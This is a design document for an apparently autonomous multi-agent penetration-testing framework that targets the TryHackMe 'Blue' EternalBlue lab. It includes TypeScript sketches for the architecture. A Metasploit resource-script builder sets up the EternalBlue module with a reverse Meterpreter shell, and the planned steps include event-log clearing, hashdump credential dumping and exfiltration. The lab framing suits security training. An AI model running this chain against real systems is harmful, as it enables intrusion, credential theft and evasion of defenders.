The Pentest Agent System is an autonomous penetration testing framework built on the MITRE ATT&CK framework. It specifically targets the "Blue" challenge on TryHackMe, which involves exploiting the MS17-010 (EternalBlue) vulnerability to gain access to a Windows 7 system and collect flags.
This document provides a comprehensive technical overview of the system architecture, component interaction, and execution flow.
The system follows a multi-agent architecture with three specialized agents: an orchestrator, a planner, and an executor.
Agent: Orchestrator
Purpose: Coordinate the overall operation flow, manage the other agents, and track progress.
Key Responsibilities:
- Initialize the system with configuration parameters
- Manage the planning and execution phases
- Handle pause, resume, and abort operations
- Track and report progress
- Collect and format the final results
Implementation Details:
- `PentestOrchestratorAgent` class in `agents/orchestrator.ts`
- Maintains an `OrchestratorState` containing overall operation status
- Provides event-based updates on operation progress
- Creates the final operation report
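The pause, resume, and abort handling together with event-based progress updates can be pictured as a small state machine. The following is a minimal sketch, not the actual implementation: the status names, the fields of `OrchestratorState`, and the `OrchestratorSketch` class with its methods are all assumptions made for illustration.

```typescript
// Hypothetical shapes: the real OrchestratorState in agents/orchestrator.ts may differ.
type OperationStatus =
  | "idle" | "planning" | "executing" | "paused" | "completed" | "aborted";

interface OrchestratorState {
  status: OperationStatus;
  completedSteps: number;
  totalSteps: number;
}

type ProgressListener = (state: OrchestratorState) => void;

// Allowed status changes. Pause and resume move between "executing" and
// "paused"; "aborted" is reachable from every non-terminal status.
const ALLOWED: Record<OperationStatus, OperationStatus[]> = {
  idle: ["planning", "aborted"],
  planning: ["executing", "aborted"],
  executing: ["paused", "completed", "aborted"],
  paused: ["executing", "aborted"],
  completed: [],
  aborted: [],
};

class OrchestratorSketch {
  private state: OrchestratorState = { status: "idle", completedSteps: 0, totalSteps: 0 };
  private listeners: ProgressListener[] = [];

  onProgress(listener: ProgressListener): void {
    this.listeners.push(listener);
  }

  // Returns a copy so callers cannot mutate the internal state.
  getState(): OrchestratorState {
    return { ...this.state };
  }

  startPlanning(): void { this.transition("planning"); }
  pause(): void { this.transition("paused"); }
  resume(): void { this.transition("executing"); }
  abort(): void { this.transition("aborted"); }

  startExecution(totalSteps: number): void {
    if (this.state.status !== "planning") {
      throw new Error("Execution can only start after planning");
    }
    this.state.totalSteps = totalSteps;
    this.transition("executing");
  }

  // Counts one finished step and completes the operation after the last one.
  recordStepCompleted(): void {
    if (this.state.status !== "executing") {
      throw new Error(`Cannot record a step while ${this.state.status}`);
    }
    this.state.completedSteps += 1;
    if (this.state.completedSteps === this.state.totalSteps) {
      this.transition("completed");
    } else {
      this.notify();
    }
  }

  private transition(next: OperationStatus): void {
    if (ALLOWED[this.state.status].indexOf(next) === -1) {
      throw new Error(`Invalid transition: ${this.state.status} -> ${next}`);
    }
    this.state.status = next;
    this.notify();
  }

  private notify(): void {
    const snapshot = this.getState();
    for (const listener of this.listeners) listener(snapshot);
  }
}
```

Keeping the allowed transitions in one table makes it easy to see that a completed or aborted operation cannot be resumed, and every state change reaches listeners through the same `notify` path.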
Agent: Planner
Purpose: Generate an attack plan based on the MITRE ATT&CK framework.
Key Responsibilities:
- Create a structured attack plan with ordered steps
- Map MITRE ATT&CK techniques to specific commands
- Define dependencies between steps
- Generate validation criteria for each step
- Save and load plans from disk
Implementation Details:
- `MitrePlannerAgent` class in `agents/planner.ts`
- Uses attack techniques defined in `config/attack_mapping.ts`
- Creates `AttackPlan` objects containing ordered `PlanStep` items
- Each step maps directly to a MITRE ATT&CK technique
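Ordering steps so that every dependency runs first is a topological sort. The sketch below shows one way to derive such an order with a depth-first traversal. The `PlanStep` fields (`id`, `techniqueId`, `dependsOn`) and the `orderSteps` function are assumptions for illustration; the real definitions in `models/plan.ts` are not shown in this document.

```typescript
// Hypothetical, simplified shape; the real PlanStep in models/plan.ts may differ.
interface PlanStep {
  id: string;
  techniqueId: string; // MITRE ATT&CK technique ID, e.g. "T1046"
  dependsOn: string[]; // IDs of steps that must finish first
}

// Returns the steps in an order where each step follows all of its
// dependencies. Throws on unknown dependencies and on cycles.
function orderSteps(steps: PlanStep[]): PlanStep[] {
  const byId: Record<string, PlanStep> = Object.create(null);
  for (const step of steps) byId[step.id] = step;

  const progress: Record<string, "visiting" | "done"> = Object.create(null);
  const ordered: PlanStep[] = [];

  const visit = (step: PlanStep): void => {
    if (progress[step.id] === "done") return;
    if (progress[step.id] === "visiting") {
      throw new Error(`Dependency cycle involving step "${step.id}"`);
    }
    progress[step.id] = "visiting";
    for (const depId of step.dependsOn) {
      const dep = byId[depId];
      if (dep === undefined) {
        throw new Error(`Step "${step.id}" depends on unknown step "${depId}"`);
      }
      visit(dep);
    }
    progress[step.id] = "done";
    ordered.push(step);
  };

  for (const step of steps) visit(step);
  return ordered;
}

// Example: steps listed out of order are sorted by their dependencies.
const examplePlan: PlanStep[] = [
  { id: "read-flags", techniqueId: "T1005", dependsOn: ["find-flags"] },
  { id: "exploit", techniqueId: "T1190", dependsOn: ["scan"] },
  { id: "scan", techniqueId: "T1046", dependsOn: [] },
  { id: "find-flags", techniqueId: "T1083", dependsOn: ["exploit"] },
];
const executionOrder = orderSteps(examplePlan).map((s) => s.id);
console.log(executionOrder.join(" -> "));
```

Rejecting cycles and unknown dependencies at planning time means the executor never has to discover a malformed plan halfway through an operation.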
Agent: Executor
Purpose: Execute the attack plan against the target system.
Key Responsibilities:
- Run the plan steps in the correct order
- Interact with external tools (Nmap, Metasploit)
- Handle command execution and error recovery
- Validate step results against expected outcomes
- Generate execution artifacts
Implementation Details:
- `ExploitExecutorAgent` class in `agents/executor.ts`
- Uses tool-specific clients (`nmap_client.ts`, `metasploit_client.ts`)
- Maintains a `PlanExecutionState` tracking progress
- Emits events at key execution points
- Collects and stores results and artifacts
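A simplified picture of the executor loop: run each step, validate its output against the step's expected outcome, update the execution state, and emit an event at each transition. Everything named below (`ExecStep`, the fields of `PlanExecutionState`, the event names, and the injected `CommandRunner`) is an assumption for illustration. The runner is passed in so the loop can be exercised without touching any real tool.

```typescript
// Hypothetical shapes; the real executor types are not shown in this document.
interface ExecStep {
  id: string;
  command: string;
  expected: RegExp; // validation criterion (use a non-global pattern)
}

type StepStatus = "pending" | "succeeded" | "failed";

interface PlanExecutionState {
  currentStepId: string | null;
  statuses: Record<string, StepStatus>;
  artifacts: Record<string, string>; // raw output per step
}

interface ExecutionEvent {
  type: "step_started" | "step_succeeded" | "step_failed";
  stepId: string;
}

type CommandRunner = (command: string) => string;

// Runs steps in order and stops at the first failure. Retries and
// fallbacks are deliberately left out of this sketch.
function executePlan(
  steps: ExecStep[],
  run: CommandRunner,
  onEvent: (event: ExecutionEvent) => void,
): PlanExecutionState {
  const state: PlanExecutionState = { currentStepId: null, statuses: {}, artifacts: {} };
  for (const step of steps) state.statuses[step.id] = "pending";

  for (const step of steps) {
    state.currentStepId = step.id;
    onEvent({ type: "step_started", stepId: step.id });

    let output = "";
    let ok = false;
    try {
      output = run(step.command);
      ok = step.expected.test(output);
    } catch (err) {
      // A thrown error counts as a failed step; keep the message as the artifact.
      output = err instanceof Error ? err.message : String(err);
    }

    state.artifacts[step.id] = output;
    state.statuses[step.id] = ok ? "succeeded" : "failed";
    onEvent({ type: ok ? "step_succeeded" : "step_failed", stepId: step.id });
    if (!ok) break;
  }
  return state;
}
```

Steps after a failure keep the `pending` status, so the final state shows exactly how far the plan got.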
The system uses several data models to represent its state:
Core Model: `AttackPlan` in `models/plan.ts`
Represents a complete attack plan with:
- Target information
- Objectives
- Ordered steps
- Dependencies
- Metadata
Core Model: `MitreAttackTechnique` in `models/mitre.ts`
Maps techniques from the MITRE ATT&CK framework with:
- Technique ID (e.g., T1190)
- Name and description
- Tactic category
- Implementation function
- Requirements and provisions
- Detection difficulty
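The "requirements and provisions" fields suggest that techniques can be chained: one technique provides a capability that another requires. The sketch below illustrates that idea under stated assumptions. The field names `requires` and `provides`, the capability labels such as `"session"`, and the `chainTechniques` function are hypothetical; the implementation function and detection difficulty fields are omitted for brevity.

```typescript
// Hypothetical, reduced shape; the real model in models/mitre.ts may differ.
interface MitreAttackTechnique {
  id: string;
  name: string;
  tactic: string;
  requires: string[]; // capabilities needed before the technique can run
  provides: string[]; // capabilities gained once it succeeds
}

// Repeatedly picks techniques whose requirements are already satisfied and
// adds what they provide. Techniques that never become runnable are left out.
function chainTechniques(techniques: MitreAttackTechnique[], initial: string[]): string[] {
  const capabilities = initial.slice();
  const chosen: string[] = [];
  let progressed = true;

  while (progressed) {
    progressed = false;
    for (const technique of techniques) {
      if (chosen.indexOf(technique.id) !== -1) continue;
      const satisfied = technique.requires.every((r) => capabilities.indexOf(r) !== -1);
      if (!satisfied) continue;
      chosen.push(technique.id);
      for (const p of technique.provides) {
        if (capabilities.indexOf(p) === -1) capabilities.push(p);
      }
      progressed = true;
    }
  }
  return chosen;
}

// Capability labels below are illustrative, not taken from the project.
const sampleTechniques: MitreAttackTechnique[] = [
  { id: "T1005", name: "Data from Local System", tactic: "Collection",
    requires: ["session", "file_paths"], provides: ["file_contents"] },
  { id: "T1083", name: "File and Directory Discovery", tactic: "Discovery",
    requires: ["session"], provides: ["file_paths"] },
  { id: "T1190", name: "Exploit Public-Facing Application", tactic: "Initial Access",
    requires: ["open_ports"], provides: ["session"] },
  { id: "T1046", name: "Network Service Scanning", tactic: "Discovery",
    requires: ["target_ip"], provides: ["open_ports"] },
];
const feasibleChain = chainTechniques(sampleTechniques, ["target_ip"]);
console.log(feasibleChain.join(" -> "));
```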
Core Model: `OperationResult` in `models/result.ts`
Stores the outcome of an operation including:
- Scan results (open ports, vulnerabilities)
- Exploit results (success, session info)
- Post-exploitation results (commands, outputs)
- Captured flags
- Summary and statistics
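To make the result model more concrete, here is a sketch of how the listed parts might fit together and how summary statistics could be derived from them. The field names and the `summarize` function are assumptions; the actual `OperationResult` in `models/result.ts` is not reproduced in this document.

```typescript
// Hypothetical shape mirroring the list above; the real model may differ.
interface OperationResult {
  target: string;
  scan: { openPorts: number[]; vulnerabilities: string[] };
  exploit: { success: boolean; sessionId: string | null };
  postExploitation: { command: string; output: string }[];
  flags: string[];
}

interface OperationSummary {
  openPortCount: number;
  vulnerabilityCount: number;
  exploited: boolean;
  commandsRun: number;
  flagsCaptured: number;
  text: string;
}

// Derives counts and a one-line description from a finished operation.
function summarize(result: OperationResult): OperationSummary {
  const openPortCount = result.scan.openPorts.length;
  const vulnerabilityCount = result.scan.vulnerabilities.length;
  const commandsRun = result.postExploitation.length;
  const flagsCaptured = result.flags.length;
  const text =
    `${result.target}: ${openPortCount} open port(s), ` +
    `${vulnerabilityCount} vulnerability finding(s), ` +
    `exploit ${result.exploit.success ? "succeeded" : "failed"}, ` +
    `${commandsRun} post-exploitation command(s), ${flagsCaptured} flag(s)`;
  return {
    openPortCount,
    vulnerabilityCount,
    exploited: result.exploit.success,
    commandsRun,
    flagsCaptured,
    text,
  };
}
```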
The system follows this execution flow:
- Initialization:
  - Parse command-line arguments
  - Load configuration
  - Set up logging
  - Initialize agents
- Planning Phase:
  - Orchestrator requests a plan from the Planner
  - Planner generates steps based on MITRE techniques
  - Plan is saved to disk for reference
- Execution Phase:
  - Orchestrator passes the plan to the Executor
  - Executor performs reconnaissance (Nmap scan)
  - Executor exploits the EternalBlue vulnerability
  - Executor performs post-exploitation actions
  - Results are collected at each step
- Result Collection:
  - Operation results are compiled
  - Flags are verified
  - Summary is generated
  - Results are saved to disk
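The flag verification step in the result collection phase could work roughly as follows. This sketch assumes that flags appear in command output as `flag{...}` tokens and that the expected number of flags is known in advance; both are assumptions, as are the function names. The document does not describe how the system actually verifies flags.

```typescript
// Assumed flag format: "flag{" followed by non-space characters and "}".
const FLAG_PATTERN = /flag\{[^}\s]+\}/gi;

// Collects unique flags from raw command outputs, in order of first appearance.
function extractFlags(outputs: string[]): string[] {
  const found: string[] = [];
  for (const output of outputs) {
    const matches: string[] = output.match(FLAG_PATTERN) || [];
    for (const flag of matches) {
      if (found.indexOf(flag) === -1) found.push(flag);
    }
  }
  return found;
}

// Hypothetical check: the operation counts as complete only when the
// expected number of distinct flags has been captured.
function allFlagsCaptured(flags: string[], expectedCount: number): boolean {
  return flags.length >= expectedCount;
}
```

Deduplicating while preserving order keeps the report stable when the same flag file is read more than once during post-exploitation.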
This system implements the following specific techniques from the MITRE ATT&CK framework:
- T1046: Network Service Scanning
  - Implementation: Nmap scan to identify open ports and services
  - Target: Identifying port 445 (SMB) and detecting MS17-010 vulnerability
- T1190: Exploit Public-Facing Application
  - Implementation: MS17-010 (EternalBlue) exploit via Metasploit
  - Target: SMB service on port 445
- T1059: Command and Scripting Interpreter
  - Implementation: Command execution via Meterpreter session
  - Target: Windows command shell
- T1068: Exploitation for Privilege Escalation
  - Implementation: EternalBlue exploit typically provides SYSTEM privileges
  - Target: Obtaining highest level privileges on the system
- T1070: Indicator Removal on Host
  - Implementation: Clearing event logs via Meterpreter
  - Target: Windows event logs
- T1003: OS Credential Dumping
  - Implementation: Hashdump via Meterpreter
  - Target: SAM database with user credentials
- T1083: File and Directory Discovery
  - Implementation: File search via Meterpreter
  - Target: Locating flag files in the system
- T1005: Data from Local System
  - Implementation: File retrieval via Meterpreter
  - Target: Flag files at known locations
- T1041: Exfiltration Over C2 Channel
  - Implementation: Data transfer via established Meterpreter session
  - Target: Flag content extraction
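A technique mapping like the one above can be expressed as a small lookup table. The sketch below is an illustration only and does not reproduce `config/attack_mapping.ts`: the `TechniqueEntry` shape and `groupByTactic` are assumptions, the `tool` values are read off the list above, and the tactic names come from the public ATT&CK matrix rather than from this document.

```typescript
type Tool = "nmap" | "metasploit" | "meterpreter";

// Hypothetical entry shape for a technique registry.
interface TechniqueEntry {
  id: string;
  name: string;
  tactic: string;
  tool: Tool;
}

const TECHNIQUES: TechniqueEntry[] = [
  { id: "T1046", name: "Network Service Scanning", tactic: "Discovery", tool: "nmap" },
  { id: "T1190", name: "Exploit Public-Facing Application", tactic: "Initial Access", tool: "metasploit" },
  { id: "T1059", name: "Command and Scripting Interpreter", tactic: "Execution", tool: "meterpreter" },
  { id: "T1068", name: "Exploitation for Privilege Escalation", tactic: "Privilege Escalation", tool: "metasploit" },
  { id: "T1070", name: "Indicator Removal on Host", tactic: "Defense Evasion", tool: "meterpreter" },
  { id: "T1003", name: "OS Credential Dumping", tactic: "Credential Access", tool: "meterpreter" },
  { id: "T1083", name: "File and Directory Discovery", tactic: "Discovery", tool: "meterpreter" },
  { id: "T1005", name: "Data from Local System", tactic: "Collection", tool: "meterpreter" },
  { id: "T1041", name: "Exfiltration Over C2 Channel", tactic: "Exfiltration", tool: "meterpreter" },
];

// Groups technique IDs by tactic, preserving the order of the input list.
function groupByTactic(entries: TechniqueEntry[]): Record<string, string[]> {
  const grouped: Record<string, string[]> = Object.create(null);
  for (const entry of entries) {
    if (grouped[entry.tactic] === undefined) grouped[entry.tactic] = [];
    grouped[entry.tactic].push(entry.id);
  }
  return grouped;
}

// Lists the technique IDs that a given tool client would have to support.
function techniquesForTool(entries: TechniqueEntry[], tool: Tool): string[] {
  return entries.filter((e) => e.tool === tool).map((e) => e.id);
}
```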
The system integrates with these external tools:
Tool: Nmap
- Used for reconnaissance
- Implemented via `NmapClient` in `utils/nmap_client.ts`
- Performs vulnerability scanning with scripts including `smb-vuln-ms17-010`
Tool: Metasploit
- Used for exploitation and post-exploitation
- Implemented via `MetasploitClient` in `utils/metasploit_client.ts`
- Executes the EternalBlue exploit module
- Manages Meterpreter sessions for post-exploitation
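As an illustration of what the tool clients might hand to the underlying programs, the sketch below builds an Nmap argument list for the `smb-vuln-ms17-010` script and a Metasploit resource script for the EternalBlue module. The function names are hypothetical and the real `NmapClient` and `MetasploitClient` may invoke the tools differently. The Nmap options, the module path `exploit/windows/smb/ms17_010_eternalblue`, and the payload name are standard; the choice of payload is an assumption.

```typescript
// Rejects anything that is not a dotted-quad IPv4 address, so that
// untrusted input never reaches a command line or resource script.
function assertIpv4(value: string): void {
  const parts = value.split(".");
  const valid =
    parts.length === 4 &&
    parts.every((p) => /^\d{1,3}$/.test(p) && Number(p) <= 255);
  if (!valid) throw new Error(`Not an IPv4 address: ${value}`);
}

// Argument vector for an SMB-only scan with the MS17-010 detection script.
function buildNmapArgs(target: string): string[] {
  assertIpv4(target);
  return ["-p", "445", "--script", "smb-vuln-ms17-010", target];
}

// Resource script lines for msfconsole. The payload is an assumed choice.
function buildEternalBlueResourceScript(target: string, localHost: string): string {
  assertIpv4(target);
  assertIpv4(localHost);
  return [
    "use exploit/windows/smb/ms17_010_eternalblue",
    `set RHOSTS ${target}`,
    `set LHOST ${localHost}`,
    "set PAYLOAD windows/x64/meterpreter/reverse_tcp",
    "run",
  ].join("\n");
}
```

Passing the Nmap arguments as an array to a process spawner, rather than as one shell string, avoids shell interpolation of the target value. The resource script can be written to a file and loaded with `msfconsole -r`.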
The system implements several error handling mechanisms:
- Step-level retries: Failed steps can be retried multiple times
- Fallback commands: Alternative commands can be executed if primary commands fail
- Non-critical step failures: The system can continue execution even if non-critical steps fail
- Timeout handling: Commands have configurable timeouts
- Exception catching: All external tool interactions are wrapped in try/catch blocks
- Graceful abort: The operation can be safely aborted at any point
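Several of these mechanisms compose naturally. The sketch below combines step-level retries, a fallback command, exception catching, and the critical versus non-critical distinction in one loop. It is synchronous to stay short, so timeouts and aborting are not modeled. The `RecoverableStep` shape and all function names are assumptions, not the project's API.

```typescript
type Action = () => string;

// Hypothetical step description for this sketch.
interface RecoverableStep {
  id: string;
  primary: Action;
  fallback?: Action;    // tried once if every primary attempt fails
  maxAttempts: number;  // attempts for the primary action
  critical: boolean;    // a failed critical step stops the run
}

interface Attempt { ok: boolean; attempts: number; output: string; error: string; }

interface StepOutcome {
  stepId: string;
  ok: boolean;
  usedFallback: boolean;
  primaryAttempts: number;
  output: string;
  error: string;
}

// Calls the action until it succeeds or the attempt limit is reached.
function tryRepeatedly(action: Action, maxAttempts: number): Attempt {
  const limit = Math.max(1, maxAttempts);
  let lastError = "";
  for (let attempt = 1; attempt <= limit; attempt++) {
    try {
      return { ok: true, attempts: attempt, output: action(), error: "" };
    } catch (err) {
      lastError = err instanceof Error ? err.message : String(err);
    }
  }
  return { ok: false, attempts: limit, output: "", error: lastError };
}

function runWithRecovery(steps: RecoverableStep[]): { outcomes: StepOutcome[]; stoppedEarly: boolean } {
  const outcomes: StepOutcome[] = [];
  for (const step of steps) {
    const primary = tryRepeatedly(step.primary, step.maxAttempts);
    let result = primary;
    let usedFallback = false;
    if (!primary.ok && step.fallback !== undefined) {
      result = tryRepeatedly(step.fallback, 1);
      usedFallback = true;
    }
    outcomes.push({
      stepId: step.id,
      ok: result.ok,
      usedFallback,
      primaryAttempts: primary.attempts,
      output: result.output,
      error: result.error,
    });
    // Non-critical failures are recorded and skipped; critical ones end the run.
    if (!result.ok && step.critical) return { outcomes, stoppedEarly: true };
  }
  return { outcomes, stoppedEarly: false };
}
```

Recording an outcome for every attempted step, including failed non-critical ones, keeps the final report complete even when the run continues past an error.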
Potential areas for improvement include:
- Expanded technique coverage: Implementing additional MITRE ATT&CK techniques
- Additional tool integration: Supporting more security tools beyond Nmap and Metasploit
- Machine learning components: Adding ML for adaptive attack planning
- Distributed architecture: Supporting multi-agent operations across multiple systems
- Enhanced visualization: Adding real-time visualization of the attack progress
- Network-based flag submission: Automatic submission of flags to validation systems